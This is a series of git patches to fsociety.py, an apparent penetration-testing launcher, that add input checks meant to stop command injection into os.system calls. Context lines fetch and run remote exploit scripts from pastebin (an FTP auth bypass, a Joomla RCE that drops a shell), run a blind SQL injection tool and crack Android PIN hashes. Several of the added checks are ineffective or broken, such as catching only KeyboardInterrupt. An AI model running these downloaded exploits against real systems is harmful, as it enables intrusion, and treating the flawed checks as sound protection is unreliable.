From b34b2678f4c5749ae56e45a8e0493d10b820db27 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Fri, 24 Jul 2020 19:46:34 +0530 Subject: [PATCH 01/10] bug fixes --- fsociety.py | 6 +++--- newfile | 7 +++++++ 2 files changed, 10 insertions(+), 3 deletions(-) create mode 100644 newfile diff --git a/fsociety.py b/fsociety.py index 3486876..09ddcfd 100644 --- a/fsociety.py +++ b/fsociety.py @@ -466,7 +466,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = raw_input(self.targetPrompt) + target = raw_input(self.targetPrompt).split(' ')[0] self.menu(target) def menu(self, target): @@ -558,7 +558,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = raw_input(" Enter a Target: ") + target = raw_input(" Enter a Target: ").split(' ')[0] self.menu(target) def installed(self): @@ -618,7 +618,7 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = raw_input(" Enter a Target: ") + target = raw_input(" Enter a Target: ").split(' ')[0] self.run(target) response = raw_input(continuePrompt) diff --git a/newfile b/newfile new file mode 100644 index 0000000..7531c81 --- /dev/null +++ b/newfile @@ -0,0 +1,7 @@ +# Nmap 7.80 scan initiated Fri Jul 24 19:32:15 2020 as: nmap -sV -oN newfile 127.0.0.1 +Nmap scan report for localhost (127.0.0.1) +Host is up (0.000066s latency). +All 1000 scanned ports on localhost (127.0.0.1) are closed + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Jul 24 19:32:15 2020 -- 1 IP address (1 host up) scanned in 0.32 seconds From d6e7ffb6f542dae9b7fccdf8d67eac9fcaaa5793 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Fri, 24 Jul 2020 19:50:58 +0530 Subject: [PATCH 02/10] bug fix --- newfile | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 newfile diff --git a/newfile b/newfile deleted file mode 100644 index 7531c81..0000000 --- a/newfile +++ /dev/null @@ -1,7 +0,0 @@ -# Nmap 7.80 scan initiated Fri Jul 24 19:32:15 2020 as: nmap -sV -oN newfile 127.0.0.1 -Nmap scan report for localhost (127.0.0.1) -Host is up (0.000066s latency). -All 1000 scanned ports on localhost (127.0.0.1) are closed - -Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -# Nmap done at Fri Jul 24 19:32:15 2020 -- 1 IP address (1 host up) scanned in 0.32 seconds From 0a12e5667144470c8056f4cd93be93115abe8e25 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 10:59:51 +0530 Subject: [PATCH 03/10] update bug fix --- fsociety.py | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/fsociety.py b/fsociety.py index 09ddcfd..a6406a5 100644 --- a/fsociety.py +++ b/fsociety.py @@ -467,7 +467,11 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] - self.menu(target) + try: + socket.gethostbyname(target) + self.menu(target) + except KeyboardInterrupt: + informationGatheringMenu() def menu(self, target): clearScr() @@ -559,7 +563,11 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - self.menu(target) + try: + socket.gethostbyname(target) + self.menu(target) + except KeyboardInterrupt: + informationGatheringMenu() def installed(self): return (os.path.isdir(self.installDir)) @@ -619,9 +627,13 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - self.run(target) - response = raw_input(continuePrompt) - + try: + socket.gethostbyname(target) + self.run(target) + response = raw_input(continuePrompt) + except KeyboardInterrupt: + informationGatheringMenu() + def installed(self): return (os.path.isdir(self.installDir)) From 31ce86e5ca95d3c6f17366259257c67f752a9f6f Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 11:25:26 +0530 Subject: [PATCH 04/10] update fix --- fsociety.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/fsociety.py b/fsociety.py index a6406a5..27e877a 100644 --- a/fsociety.py +++ b/fsociety.py @@ -467,8 +467,9 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -563,8 +564,9 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -627,8 +629,9 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: From 67cd70b67d3283b7754fa3bac8fc6a86c6d8410a Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 11:51:37 +0530 Subject: [PATCH 05/10] fux updated --- fsociety.py | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/fsociety.py b/fsociety.py index 27e877a..e4a3f07 100644 --- a/fsociety.py +++ b/fsociety.py @@ -467,9 +467,14 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -564,9 +569,14 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -629,9 +639,14 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: From d8477b3630de1c3edd7489659dcbae4046942d9d Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 22:40:23 +0530 Subject: [PATCH 06/10] fix updates --- fsociety.py | 42 ++++++++++++++++++++++++------------------ 1 file changed, 24 insertions(+), 18 deletions(-) diff --git a/fsociety.py b/fsociety.py index e4a3f07..83c164d 100644 --- a/fsociety.py +++ b/fsociety.py @@ -569,14 +569,13 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/') + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(test_target[0]) - if len(test_target) > 1: - try: - int(test_target[1]) - except KeyboardInterrupt: - informationGatheringMenu() + urllib2.urlopen(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -639,14 +638,13 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/') + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(test_target[0]) - if len(test_target) > 1: - try: - int(test_target[1]) - except KeyboardInterrupt: - informationGatheringMenu() + urllib2.urlopen(test_target) self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -716,9 +714,18 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = raw_input(" Enter a Target: ") - self.run(target) - response = raw_input(continuePrompt) + target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target + try: + urllib2.urlopen(test_target) + self.run(target) + response = raw_input(continuePrompt) + except KeyboardInterrupt: + informationGatheringMenu() def installed(self): return (os.path.isdir(self.installDir)) @@ -1103,7 +1110,6 @@ def bsqlbf(): os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") - def atscan(): print ("Do You To Install ATSCAN ?") if yesOrNo(): From ba18e08fb560e67a6d8c17a0a9572ae9b86c4c0e Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 12:54:59 +0530 Subject: [PATCH 07/10] all fixes --- fsociety.py | 100 +++++++++++++++++++++++++++++++++++++--------------- 1 file changed, 71 insertions(+), 29 deletions(-) diff --git a/fsociety.py b/fsociety.py index 83c164d..d5f4715 100644 --- a/fsociety.py +++ b/fsociety.py @@ -575,7 +575,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -644,7 +646,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -721,7 +725,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -736,8 +742,6 @@ def install(self): os.system("pip install beautifulsoup4 requests Django==1.11") def run(self, target): - if not "http://" in target: - target = "http://" + target logPath = "logs/doork-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" try: @@ -1036,8 +1040,12 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = raw_input("Enter Target IP: ") - os.system("brutex %s" % target) + target = raw_input("Enter Target IP: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system("brutex %s" % target) + except KeyboardInterrupt: + fsociety() class arachni: @@ -1061,9 +1069,13 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = raw_input("Enter Target Hostname: ") - os.system("arachni %s --output-debug 2> %sarachni/%s.log" % - (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) + target = raw_input("Enter Target Hostname: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system("arachni %s --output-debug 2> %sarachni/%s.log" % + (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) + except KeyboardInterrupt: + fsociety() # Updated to Here @@ -1081,9 +1093,18 @@ def gabriel(): print("Abusing authentication bypass of Open&Compact (Gabriel's)") os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") clearScr() + common_commands = ['get','put','list','GET','PUT','LIST'] os.system("python gabriel.py") - ftpbypass = raw_input("Enter Target IP and Use Command:") - os.system("python gabriel.py %s" % ftpbypass) + ftpbypass = raw_input("Enter Target IP and Use Command:").split(' ') + try: + socket.gethostbyname(ftpbypass[0]) + if ftpbypass[1] in common_commands: + os.system("python gabriel.py %s %s" % (ftpbypass[0],ftpbypass[1])) + else: + print 'Command Error!!. Please check the Use command.' + fsociety() + except KeyboardInterrupt: + fsociety() def sitechecker(): @@ -1105,10 +1126,19 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = raw_input("select target: ") - os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") - os.system("perl bsqlbf.pl -url %s" % cbsq) - os.system("rm bsqlbf.pl") + cbsq = raw_input("select target: ").split(' ')[0] + test_target = urlparse(cbsq) + try: + socket.gethostbyname(test_target.netloc) + if test_target.scheme != '': + cbsq = test_target.scheme + '://' + test_target.netloc + test_target.path + else: + cbsq = test_target.netloc + test_target.path + os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") + os.system("perl bsqlbf.pl -url %s" % cbsq) + os.system("rm bsqlbf.pl") + except KeyboardInterrupt: + fsociety() def atscan(): print ("Do You To Install ATSCAN ?") @@ -1142,9 +1172,12 @@ def joomlarce(): os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = raw_input("Select a targets list:") - os.system("python temp.py %s" % jmtarget) - + jmtarget = raw_input("Select a targets list:").split(' ')[0] + try: + os.path.exists(jmtarget) + os.system("python temp.py %s" % jmtarget) + except KeyboardInterrupt: + fsociety() def inurl(): dork = raw_input("select a Dork:") @@ -1347,20 +1380,29 @@ def shellnoob(): def androidhash(): - key = raw_input("Enter the android hash: ") - salt = raw_input("Enter the android salt: ") - os.system( - "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") - os.system( - "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt)) + key = raw_input("Enter the android hash: ").split(' ')[0] + salt = raw_input("Enter the android salt: ").split(' ')[0] + symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+'] + if symbols not in key and symbols not in salt: + os.system( + "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") + os.system( + "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt)) + else: + print 'Hash or Slat Error. Please check the hash and salt.' + fsociety() def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = raw_input("Select a target: ") - os.system( - "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") - os.system("python cms.py %s" % target) + target = raw_input("Select a target: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system( + "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") + os.system("python cms.py %s" % target) + except KeyboardInterrupt: + fsociety() def smtpsend(): From 9d28d77055d9e759f594f156df26f60ab0370e92 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 13:19:22 +0530 Subject: [PATCH 08/10] all fixes --- fsociety.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fsociety.py b/fsociety.py index d5f4715..cfc8a4c 100644 --- a/fsociety.py +++ b/fsociety.py @@ -1174,8 +1174,8 @@ def joomlarce(): print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") jmtarget = raw_input("Select a targets list:").split(' ')[0] try: - os.path.exists(jmtarget) - os.system("python temp.py %s" % jmtarget) + if os.path.exists(jmtarget): + os.system("python temp.py %s" % jmtarget) except KeyboardInterrupt: fsociety() From c760f9eb1f19ef5c82205104d50d8d0a8bc00ae5 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 21:55:09 +0530 Subject: [PATCH 09/10] update all fixes --- fsociety.py | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/fsociety.py b/fsociety.py index cfc8a4c..989445d 100644 --- a/fsociety.py +++ b/fsociety.py @@ -1070,8 +1070,15 @@ def install(self): def run(self): target = raw_input("Enter Target Hostname: ").split(' ')[0] + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) except KeyboardInterrupt: @@ -1181,10 +1188,12 @@ def joomlarce(): def inurl(): dork = raw_input("select a Dork:") - output = raw_input("select a file to save:") - os.system( - "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) - webHackingMenu.completed("InurlBR") + output = raw_input("select a file to save:").split(' ')[0] + all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'] + if dork in all_dorks: + os.system( + "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) + webHackingMenu.completed("InurlBR") def insinurl(): @@ -1382,8 +1391,8 @@ def shellnoob(): def androidhash(): key = raw_input("Enter the android hash: ").split(' ')[0] salt = raw_input("Enter the android salt: ").split(' ')[0] - symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+'] - if symbols not in key and symbols not in salt: + symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+', ' '] + if [symbol for symbol in symbols if symbol not in key and symbol not in salt] == symbols: os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( From 00505d6c93cfdc95359e7285db46722996e3de9e Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 22:01:22 +0530 Subject: [PATCH 10/10] update all fixes --- fsociety.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fsociety.py b/fsociety.py index 989445d..0f468c2 100644 --- a/fsociety.py +++ b/fsociety.py @@ -1187,7 +1187,7 @@ def joomlarce(): fsociety() def inurl(): - dork = raw_input("select a Dork:") + dork = raw_input("select a Dork:").split(' ')[0] output = raw_input("select a file to save:").split(' ')[0] all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'] if dork in all_dorks: